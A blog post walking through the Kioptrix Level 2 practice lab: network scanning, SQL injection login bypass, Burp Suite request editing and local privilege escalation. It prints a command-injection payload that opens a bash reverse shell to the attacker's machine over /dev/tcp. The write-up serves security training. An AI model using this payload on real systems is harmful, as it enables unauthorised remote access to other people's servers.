Security

Kioptrix updated – level2

Step 1:

Reconnaissance(Finding network):

First, we need to know in which network we are by finding our host IP address.

So, we are in the network of 192.168.1.0 with subnet mask 255.255.255.0 and our Kali IP is 192.168.1.34

Step 2:

Finding remote hosts and detect target vulnerable host:

Using nmap to scan for open ports and operating services

Open ports are: 22, 80, 111, 443, 631(IPP protocol for connecting network printers), 844, 3306

We can guess by looking at mysql port 3306 that there might be a web page available since port 80 is open.

Step 3:

Exploiting Vulnerability

Let’s check for Golden basic SQL Injection vulnerability:

DONE!!!. We exploited sql injection vulnerability. But when the new web page appearing (like below) there is no button for submitting data (POST/GET)!!! It is a bit strange. Let’s find out how to work around this? 🙂

I used BurpSuite community edition to capture and change request/responses parameters to the web server

Make sure the intercept is ON and click on the open browser. Then enter the address of web server in this case: http://192.168.1.102

Now, Redo the sql injection again this time using BurpSuite and looking at what parameters are passing between client and server.

Now, if we inspect, we can see that some html error causes the SUBMIT button to disappear. But we can detect the parameters needed to pass to the web server, and the FORM action php page is in charge. They are “ip” parameter and “submit” button and pingit.php page.

In the above, we should right click on packet received from 192.168.1.102 and choose send to Repeater in order to let us EDIT the request.

Below, change the action php page and adjust our parameters. And click on the SEND orange button and look at the RESPONSE window. We got the result. BOOM!

Now for simplicity, not sending every single packet through the BrupSuite, we need to tell the server to establish a reverse shell to our system (attacker). Using the nc command we open a port 444 and listen to it and wait for the server to connect.

Enter following command:

127.0.0.1;bash -i >& /dev/tcp/192.168.1.34/444 0>&1

Notice: for every single WHITE SPACE we put %20 and for & sign we put %26 (codes for those characters since space and special characters must be sent by their corresponding code)

We get a shell. But by issuing an id command, we can see that our user(apache) does not have enough privileges. It is not ROOT yet.

Step 4:

Privilege Escalation

We know server is running CentOS 4.5

A quick search on exploit-db gives us the exploit to escalate the privilege.

We cannot issue wget on the victim machine (not connected to the internet). We download the exploit on the Kali system and start the apache2 web server on the Kali. then download the exploit from Kali to the victim

After exploit downloaded on Kali, we need to change directory on the victim in order to have write and compile privileges (to compile and run the exploit) so move to /tmp and download from Kali and compile and run it.

Comments (2)

buy anabolic online | 21 October 2021 - 18:35

Thanks for the good article, I hope you continue to work as well.

buy anabolic online | 25 October 2021 - 12:25

Thanks for the good article, I hope you continue to work as well.

Write your comment

Your email address will not be published.